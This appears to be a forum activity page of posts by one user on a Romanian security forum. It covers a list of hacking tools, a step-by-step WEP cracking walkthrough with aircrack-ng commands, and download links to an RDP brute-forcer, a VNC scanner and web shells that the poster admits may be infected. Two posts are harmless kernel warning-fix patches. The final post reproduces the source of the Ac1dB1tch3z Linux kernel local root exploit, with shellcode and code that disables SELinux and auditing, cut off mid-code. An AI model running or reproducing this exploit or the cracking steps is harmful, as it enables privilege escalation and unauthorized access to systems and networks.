Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    These are Top 20 Hacking Tools, the list is exhaustive, this are a few to name. Nessus The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix. Ethereal Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. Snort Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks. Netcat Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol TCPdump TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications. Hping Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions). DNSiff DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). GFI LANguard GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities. Ettercap >Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis. Nikto Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers. John the Ripper John the Ripper is a fast password cracker, currently available for many flavors of Unix. OpenSSH OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks. TripWire Tripwire is a tool that can be used for data and program integrity assurance. Kismet Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area. NetFilter NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling. IP Filter IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services. pf OpenBSD Packet Filter fport fport identifys all open TCP/IP and UDP ports and maps them to the owning application. SAINT SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited. OpenPGP OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann. Sursa: Top 20 Hacking Tools | Hacking Truths
  2. Nytro
    Cred ca aici e fara parola: Download RDP Brute v.0.6.rar from Sendspace.com - send big files the easy way
  3. Nytro
    CRACK WIFI – Simple WEP Crack Overview To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time. Equipments used Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon) Software : Backtrack 4 (Free download from BackTrack Linux - Penetration Testing Distribution) Step 1 – Start the wireless interface in monitor mode on AP channel airmon-ng start wlan1 6 starts wifi interface in channel 6 Step 2 – Test Wireless Device Packet Injection aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1 -9 means injection -a 00:1B:11:24:27:2E is the access point MAC address Step 3 – Start airodump-ng to capture the IVs airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1 Step 4 – Use aireplay-ng to do a fake authentication with the access point In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1 -1 means fake authentication 0 reassociation timing in seconds -e infosec is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:0F:B5:88:AC:82 is our card MAC address OR aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1 2 – Reauthenticate every 2 seconds. -o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs. -q 10 – Send keep alive packets every 10 seconds. Troubleshooting Tips Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and… Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)” You would then look for error messages. If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and… Run: “tcpdump -n -e -s0 -vvv -i wlan1” Here is a typical tcpdump error message you are looking for: 11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets. If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want. Step 5 – Start aireplay-ng in ARP request replay mode aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1 Step 6 – Run aircrack-ng to obtain the WEP key aircrack-ng -b 00:1B:11:24:27:2E output*.cap All Done! Sursa: Crack Wifi | Hacking Articles
  4. Nytro
    RDP Scanner [bruteForce] Nu am incercat, nu stiu daca e infectat. RDP Brutus, based on all known tss Brutus. * Select the type of scan IP: one specified range, either immediately on the list of ranges. * Option flows for the scanner, the ability to change the port for the scan * Settings flows for Brutus (how IP will be checked on a separate thread) * Ability to scan without Brutus * Brutus, a list of usernames to the list of passwords * Work anywhere on the disk (including the Russian way) * Avtosvorachivanie windows Brutus * Edit the list of usernames and passwords directly from the program * Output sbruchennyh grandparents in a separate window by pressing the button at any time (even in the Brut) * Sending Hoods at your number ICQ (master Ween - Ie only the number that you want to send - you can specify in the preferences) Howto: http://www.file-upload.net/download-2791486/h4cky0u.txt.html Download: http://www.sendspace.com/file/tv1whv Sursa: h4cky0u
  5. Nytro
    Nu le-am incercat, nu stiu daca sunt infectate... The scanner runs through a file with extension . bat , or as many call it "batnik. Which contains the lines, for example:'' vnc.exe -I 88.158.0.0-88,158,255,255 -P 3389 -cT -T 2900 where vnc.exe - the name of the scanner 88.158.0.0-88.158.255.255 - scanning range 3389 - the port on which the scanned range 2900 - number of threads Scanned the list is saved in a file VNC_bypauth.txt, obtained a list of species -------------------------------------------------- -------------------------- COMMAND: vnc.exe -I 88.158.0.0-88,158,255,255 -P 3389 -cT -T 2900 -------------------------------------------------- -------------------------- 88.158.1.66 :3389 88.158.1.186 :3389 88.158.1.222 :3389 88.158.5.2 :3389 88.158.5.22 :3389 88.158.6.14 :3389 88.158.6.22 :3389 88.158.9.26 :3389 88.158.9.54 :3389 88.158.9.78 :3389 88.158.9.166 :3389 88.158.9.182 :3389 88.158.9.194 :3389 88.158.10.34 :3389 88.158.11.18 :3389 88.158.12.42 :3389 88.158.12.46 :3389 Of course, you can remove all unnecessary hands, but also there is another batnik, which removes all the rubbish and keep on file result_ip.txt only ip-address, open port 3389. Sam batnik: del result_ip.txt Findstr /C:": 3389" VNC_bypauth.txt>vnc1.txt FOR /F "eol = tokens = number 1 delims =:" %%I in (vnc1.txt) do @ echo%%I>>result_ip.txt del vnc1.txt Download the archive with two batnikami and scanner can be in the enclosure. The second version of the scanner, but it has a GUI-shell. VNC-Scanner GUI For fans of the scanner VNC: convenient GUI with packed inside the scanner diapy built for scan, which can be unpacked at any time parser low weight (162 kb) and to all this - source code on Delphi -> You can add your function or anything else. http://www.proxy-base.org/attachments/f20/1015d1267652722-vnc_scanner-vnc_scanner_gui.zip http://www.proxy-base.org/attachments/f20/1057d1268594784-vnc_scanner-vnc_scanner.rar VNC-Scanner GUI v.1.1 Added: - Ability to scan the specified ranges. http://www.proxy-base.org/attachments/f20/1088d1269698414-vnc_scanner-vnc_scanner_gui_v.1.1.zip VNC-Scanner GUI v.1.2 http://www.proxy-base.org/attachments/f20/1252d1271586730-vnc_scanner-vnc_scanner_gui.rar
  6. Nytro
    SQL Injection and XSS Tools Nu am descarcat, nu am incercat etc. Apache Hacking TooLz Directory: Apache Chunked Scanner Apache Hacker Tool v 2.0 Apache H4x0r Script Remote File Inclusion And Remote Command Execution Directory : IIS 5 Dav Scanner & Exploiter PHP Attacker PHP Injection Scanner & Exploiter XML-RPC Scanner & Exploiter Databases & SQL Injection & XSS TooLz Directory Casi 4.0 ForceSQL Mssql BruteForce TooL SQL Ping 2 SQL Recon SQL Vuln Scanner SQL & XSS TooL PHP Shells **** v2.0 c99shell #16 Backdoor php v0.1 r57shell ajan casus15 cmd (asp) CyberEye (asp) CyberSpy5 (asp) Indexer (asp) Ntdaddy (asp) News Remote PHP Shell Injection PHP Shell phpRemoteView Download: http://rapidshare.com/files/132986898/SQL_InjecTion___XSS_TooLz.rar
  7. Nytro
    [PATCH] drivers/block/cciss.c (2.6.34.7): Fixed useless compile warning Cam la fel, un vector e initializat intr-un else, si in teorie poate fi folosit neinitializat, in practica nu se intampla asta, dar compilatorul nu are de unde sa stie asta. Doar o simpla initializare cu 0. Nu vor mai aparea aceste avertismente urate: drivers/block/cciss.c: In function ‘dev_show_unique_id’: drivers/block/cciss.c:564:7: warning: ‘sn[0]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[1]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[2]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[3]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[4]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[5]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[6]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[7]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[8]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[9]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[10]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[11]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[12]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[13]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[14]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[15]’ may be used uninitialized in this function Patch: --- a/drivers/block/cciss.c 2010-09-17 20:17:49.844010958 +0300 +++ b/drivers/block/cciss.c 2010-09-13 19:54:58.000000000 +0300 @@ -561,7 +561,7 @@ static ssize_t dev_show_unique_id(struct { drive_info_struct *drv = to_drv(dev); struct ctlr_info *h = to_hba(drv->dev.parent); + __u8 sn[16]; - __u8 sn[16] = {0}; unsigned long flags; int ret = 0; Edit: Era inversat acesta, modificasem fisierul original sa vad daca mai apare eroare, si era inversat + cu -.
  8. Nytro
    Ma bucur sa vad ca exista oameni interesati si de aceste lucruri. Imi place aceasta activitate. Am mai trimis unul, dar nu am stiut exact cui, l-am trimis la "trivial". [PATCH] /init/main.c (2.6.34.7) Fixed useless compile warning From: Ionut Gabriel Popescu <*******@yahoo.com> First of all, I am really sorry, I didn't know where to send this, I didn't know who is the maintainer of that (/init) section. This is not practically a bug, but the compiler can't be sure about that. The calltime structure is initialized in the first if and it is used in same condition if downer, but the compiler doesn't know that is the same condition, that si always the same and throw this warning: init/main.c: In function ‘do_one_initcall’: init/main.c:722:10: warning: ‘calltime.tv64’ may be used uninitialized in this function And this is ugly. It is very easy to fix it, just initialize the calltime structure with 0. It isn't necessary, but the compiler won't throw that ugly warning anymore. I am sorry for sending this to you, can you send it where it would be coreect please? Thanks. Patch: Signed-off-by: Ionut Gabriel Popescu <*******@yahoo.com> --- --- a/init/main.c 2010-09-17 10:37:25.496004183 +0300 +++ b/init/main.c 2010-09-13 19:54:58.000000000 +0300 @@ -719,7 +719,7 @@ static struct boot_trace_ret ret; int do_one_initcall(initcall_t fn) { int count = preempt_count(); - ktime_t calltime = {0}, delta, rettime; + ktime_t calltime, delta, rettime; if (initcall_debug) { call.caller = task_pid_nr(current); Sa vedem daca o sa fie reparat. De obicei dureaza cam 2 saptamani pana apar, cam asa am inteles. Bine, cele de securitate sunt reparate in maxim cateva ore.
  9. Nytro
    Nu mi se pare nimic ciudat la el, sau nu am inteles ce vrei sa spui. Mai intai sunt incluse headerele apoi sunt definite 2 tipuri de functii apoi functiile pe care le foloseste, apoi main-ul.
  10. Nytro
    Linux Kernel 2.6.27+ x86_64 compat exploit /* Ac1dB1tch3z Vs Linux Kernel x86_64 0day Today is a sad day.. R.I.P. Tue, 29 Apr 2008 / Tue, 7 Sep 2010 a bit of history: MCAST_MSFILTER Compat mode bug found... upon commit! (2 year life on this one) author David L Stevens <dlstevens () us ibm com> Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700) committer David S. Miller <davem () davemloft net> Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700) This patch adds support for getsockopt for MCAST_MSFILTER for both IPv4 and IPv6. It depends on the previous setsockopt patch, and uses the same method. Signed-off-by: David L Stevens <dlstevens () us ibm com> Signed-off-by: YOSHIFUJI Hideaki <yoshfuji () linux-ipv6 org> Signed-off-by: David S. Miller <davem () davemloft net> ------------------------------------------------------------ Thank you for signing-off on this one guys. This exploit has been tested very thoroughly over the course of the past few years on many many targets. Thanks to redhat for being nice enough to backport it into early kernel versions (anything from later August 2008+) Ac1dB1tch3z would like to say F*** YOU Ben Hawkes. You are a new hero! You saved the plan8 man. Just a bit too l8. PS: OpenVZ Payload / GRsec bypass removed for kidiots and fame whores. (same thing right */ #include <poll.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <stdlib.h> #include <sys/wait.h> #include <sys/utsname.h> #include <sys/socket.h> #include <sched.h> #include <netinet/in.h> #include <stdio.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/mman.h> #include <sys/ipc.h> #include <sys/msg.h> #include <errno.h> #ifndef __i386__ #error "r34d th3 c0d3 m0r0n!!# () #" #else #define _GNU_SOURCE #define __dgdhdytrg55 unsigned int #define __yyrhdgdtfs66ytgetrfd unsigned long long #define __dhdyetgdfstreg__ memcpy #define VERT "\033[32m" #define NORM "\033[0m" #define BANNER VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4y\n" #define KALLSYMS "/proc/kallsyms" #define TMAGIC_66TDFDRTS "/proc/timer_list" #define SELINUX_PATH "/selinux/enforce" #define RW_FOPS "timer_list_fops" #define PER_C_DHHDYDGTREM7765 "per_cpu__current_task" #define PREPARE_GGDTSGFSRFSD "prepare_creds" #define OVERRIDE_GGDTSGFSRFSD "override_creds" #define REVERT_DHDGTRRTEFDTD "revert_creds" #define Y0Y0SMAP 0x100000UL #define Y0Y0CMAP 0x200000UL #define Y0Y0STOP (Y0Y0SMAP+0xFFC) #define J0J0S 0x00200000UL #define J0J0R00T 0x002000F0UL #define PAGE_SIZE 0x1000 #define KERN_DHHDYTMLADSFPYT 0x1 #define KERN_DGGDYDTEGGETFDRLAK 0x2 #define KERN_HHSYPPLORQTWGFD 0x4 #define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8 #define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10 #define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20 #define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40 #define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5")) #define TRY_REMAP_DEFAULT 1 #define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0) #define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0) #define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0) #define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0) static char buffer[1024]; static int s; static int flags=0; volatile static socklen_t magiclen=0; static int useidt=0, usefops=0, uselsm=0; static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0}; static __dgdhdytrg55 _m_cpu_off=0; static char krelease[64]; static char kversion[128]; #define R0C_0FF 14 static char ttrg0ccc[]= "\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41" "\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c" "\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11" "\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02" "\xeb\xcc\x5e\x5b\x5f\x59\xc3"; #define R0YTTTTUHLFSTT_OFF1 5 #define R0YGGSFDARTDF_DHDYTEGRDFD_D 21 #define R0TDGFSRSLLSJ_SHSYSTGD 45 char r1ngrrrrrrr[]= "\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3" "\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42" "\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7" "\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43" "\xff\xd3\x5f\x5f\x5a\x5b\xc3"; #define RJMPDDTGR_OFF 13 #define RJMPDDTGR_DHDYTGSCAVSF 7 #define RJMPDDTGR_GDTDGTSFRDFT 25 static char ttrfd0[]= "\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00" "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0" "\x58\x5f" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xc3"; /* implement selinux bypass for IDT ! */ #define RJMPDDTGR_OFF_IDT 14 #define RJMPDDTGR_DYHHTSFDARE 8 #define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27 static char ruujhdbgatrfe345[]= "\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00" "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0" "\x0f\x01\xf8" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x48\xcf"; #define CJE_4554TFFDTRMAJHD_OFF 10 #define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23 static char dis4blens4sel1nuxhayettgdr64545[]= "\x41\x52\x50" "\xb8\x00\x00\x00\x00" "\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x89\x02" "\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42" "\x41\x89\x02" "\x58\x41\x5a"; /* rhel LSM stuffs */ #define RHEL_LSM_OFF 98 struct LSM_rhel { __yyrhdgdtfs66ytgetrfd selinux_ops; __yyrhdgdtfs66ytgetrfd capability_ops; __yyrhdgdtfs66ytgetrfd dummy_security_ops; __yyrhdgdtfs66ytgetrfd selinux_enforcing; __yyrhdgdtfs66ytgetrfd audit_enabled; const char *krelease; const char *kversion; }; struct LSM_rhel known_targets[4]= { { 0xffffffff8031e600ULL, 0xffffffff8031fec0ULL, 0xffffffff804acc00ULL, 0xffffffff804af960ULL, 0xffffffff8049b124ULL, "2.6.18-164.el5", "#1 SMP Thu Sep 3 03:28:30 EDT 2009" // to manage minor/bug fix changes }, { 0xffffffff8031f600ULL, 0xffffffff80320ec0ULL, 0xffffffff804afc00ULL, 0xffffffff804b2960ULL, 0xffffffff8049e124ULL, "2.6.18-164.11.1.el5", "#1 SMP Wed Jan 6 13:26:04 EST 2010" }, { 0xffffffff805296a0ULL, 0xffffffff8052af60ULL, 0xffffffff806db1e0ULL, 0xffffffff806ddf40ULL, 0xffffffff806d5324ULL, "2.6.18-164.11.1.el5xen", "#1 SMP Wed Jan 20 08:06:04 EST 2010" // default xen }, { 0xffffffff8031f600ULL,// d selinux_ops 0xffffffff80320ec0ULL,// d capability_ops 0xffffffff804afc00ULL,// B dummy_security_ops 0xffffffff804b2960ULL,// B selinux_enforcing 0xffffffff8049e124ULL,// B audit_enabled "2.6.18-164.11.1.el5", "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL } }; static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt; struct socketcallAT { int s; int level; int optname; void *optval; volatile socklen_t *optlen; }__attribute__((packed)); struct idt64from32_s { unsigned short limit; unsigned long base; }__attribute__((packed)); static __yyrhdgdtfs66ytgetrfd getidt() { struct idt64from32_s idt; memset(&idt, 0x00, sizeof(struct idt64from32_s)); asm volatile("sidt %0" : "=m"(idt)); return idt.base | 0xFFFFFFFF00000000ULL; } static int isSelinuxEnabled() { FILE *selinux_f; selinux_f = fopen(SELINUX_PATH, "r"); if(selinux_f == NULL) { if(errno == EPERM) return 1; else return 0; } fclose(selinux_f); return 1; } static int wtfyourunhere_heee(char *out_release, char* out_version) { int ret; const char*ptr; int count=0; char r[32], *bptr; struct utsname buf; ret = uname(&buf); if(ret < 0) return -1; strcpy(out_release, buf.release); strcpy(out_version, buf.version); ptr = buf.release; bptr = r; memset(r, 0x00, sizeof(r)); while(*ptr) { if(count == 2) { if(*ptr >= '0' && *ptr <= '9') *bptr++ = *ptr; else break; } if(*ptr == '.') count++; ptr++; } if(strlen(r) < 1 || !atoi(r)) return -1; return atoi(r); } static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table) { *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing; *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled; __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); } static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag) { FILE *ka; char line[512]; char reloc_a[64]; char reloc[64]; if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag) return 0; ka = fopen(filename, "r"); if(!ka) return 0; while(fgets(line, 512, ka) != NULL) { char *l_p = line; char *ra_p = reloc_a; char *r_p = reloc; memset(reloc, 0x00, sizeof(reloc)); memset(reloc_a, 0x00, sizeof(reloc_a)); while(*l_p != ' ' && (ra_p - reloc_a) < 64) *ra_p++ = *l_p++; l_p += 3; while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64) *r_p++ = *l_p++; if(!strcmp(reloc, s)) { __gggdfstsgdt_dddex("$$$ %s->%s\n", s, reloc_a); return strtoull(reloc_a, NULL, 16); } } return 0; } static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s) { return get_sym_ex(s, KALLSYMS, 0); } static int parse_cred(const char* val) { int i=0; const char* p = val; char local[64], *l; for(i=0; i<3; i++) { memset(local, 0x00, sizeof(local)); l = local; while(*p && *p != ',') *l++ = *p++; if(!(*p) && i != 2) return -1; _m_cred[i] = strtoull(local, NULL, 16); p++; } return 0; } #define SELINUX_OPS "selinux_ops" #define DUMMY_SECURITY_OPS "dummy_security_ops" #define CAPABILITY_OPS "capability_ops" #define SELINUX_ENFORCING "selinux_enforcing" #define AUDIT_ENABLED "audit_enabled" struct LSM_rhel *lsm_rhel_find_target(int check_rhel) { int i; char mapbuf[128]; struct LSM_rhel *lsm = &(known_targets[0]); if(check_rhel && !isRHHGDPPLADSF(krelease)) { __pppp_tegddewyfg("!!! N0t a RH3l k3rn3l \n"); return NULL; } __pppp_tegddewyfg("$$$ L00k1ng f0r kn0wn t4rg3tz.. \n"); for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++) { if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion)) { __gggdfstsgdt_dddex("$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion); return lsm; } } __pppp_tegddewyfg("$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...\n"); strcpy(mapbuf, "/boot/System.map-"); strcat(mapbuf, krelease); dyn4nt4n1labeggeyrthryt.selinux_ops = get_sym_ex(SELINUX_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.capability_ops = get_sym_ex(CAPABILITY_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.selinux_enforcing = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1); dyn4nt4n1labeggeyrthryt.audit_enabled = get_sym_ex(AUDIT_ENABLED, mapbuf, 1); if(!dyn4nt4n1labeggeyrthryt.selinux_ops || !dyn4nt4n1labeggeyrthryt.dummy_security_ops || !dyn4nt4n1labeggeyrthryt.capability_ops || !dyn4nt4n1labeggeyrthryt.selinux_enforcing || !dyn4nt4n1labeggeyrthryt.audit_enabled) return NULL; return &dyn4nt4n1labeggeyrthryt; } static void put_your_hands_up_hooker(int argc, char *argv[]) { int fd,ver,ret; char __b[16]; fd = open(KALLSYMS, O_RDONLY); ret = read(fd, __b, 16); // dummy read if((fd >= 0 && ret > 0)) { __pppp_tegddewyfg("$$$ Kallsyms +r\t\n"); // d0nt p4tch m3 br0 flags |= KERN_HHSYPPLORQTWGFD; } close(fd); ver = wtfyourunhere_heee(krelease, kversion); if(ver < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!\n"); __gggdfstsgdt_dddex("$$$ K3rn3l r3l3as3: %s\n", krelease); if(argc != 1) { while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0) { switch(ret) { case 'i': flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS; useidt=1; // u have to use -i to force IDT Vector break; case 'f': flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT; break; case 'l': flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS; break; case 'c': if(!optarg || parse_cred(optarg) < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 p4s3 cr3d c0d3z\n"); break; case 'k': if(optarg) _m_fops = strtoull(optarg, NULL, 16); else __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0P numb3rs\n"); break; case 's': if(!isSelinuxEnabled()) __pppp_tegddewyfg("??? wh4t th3 fuq s3l1nux 1z n0t 3v3n 3n4bl3d!?\n"); else flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX; break; case 'o': if(optarg) _m_cpu_off = strtoull(optarg, NULL, 16); else __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n"); break; } } } if(ver >= 29) // needs cred structure { flags |= KERN_DGGDYDTEGGETFDRLAK; if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) { _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD); _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD); _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD); } if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) { __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n"); } __pppp_tegddewyfg("$$$ Kernel Credentials detected\n"); *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0]; *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1]; *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2]; } if(ver >= 30) // needs cpu offset { flags |= KERN_DHHDYTMLADSFPYT; if(!_m_cpu_off) _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765); if(!_m_cpu_off) __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n"); __pppp_tegddewyfg("$$$ K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n"); *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off; *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + 